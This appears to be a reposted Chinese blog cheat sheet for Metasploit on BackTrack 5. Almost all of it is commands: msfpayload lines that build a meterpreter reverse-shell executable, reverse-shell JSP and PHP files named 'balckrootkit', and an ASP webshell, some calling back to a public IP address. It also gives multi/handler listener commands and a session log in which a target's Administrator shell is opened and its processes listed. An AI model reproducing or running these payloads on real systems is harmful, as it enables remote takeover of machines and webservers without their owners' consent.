BT5 msf msfpayload生成2进制 msf生成exe meterpreter监听

BT5 msf msfpayload生成2进制 msf生成exe
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.85.147 LPORT=4444 X >/root/Desktop/mt.exe


其它脚本
msfpayload java/jsp_shell_reverse_tcp LHOST=58.60.195.226  LPORT=1234 R > balckrootkit.jsp

msfcli multi/handler PAYLOAD=java/jsp_shell_reverse_tcp LHOST=58.60.195.226 LPORT=1234 E

msfpayload php/reverse_php  LHOST=58.60.195.226 LPORT=1234 R > balckrootkit.php

msfcli multi/handler PAYLOAD=php/reverse_php  LHOST=58.60.195.226 LPORT=1234 E

msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.167| msfencode -t asp -o webshell.asp

msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.0.167 LPORT=443 E

监听

msf > use multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.85.147
LHOST => 192.168.85.147
msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.85.147:4444
[*] Starting the payload handler...             //接着在目标机运行 mt.exe
[*] Sending stage (769536 bytes) to 192.168.85.160
[*] Meterpreter session 1 opened (192.168.85.147:4444 -> 192.168.85.160:1262) at 2014-08-26 10:45:11 +0800

meterpreter >


meterpreter > getuid    查看权限
Server username: K8ANTI-B2B9B81C\Administrator
meterpreter > ps   查看进程

转载于:https://www.cnblogs.com/mujj/articles/4026190.html

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值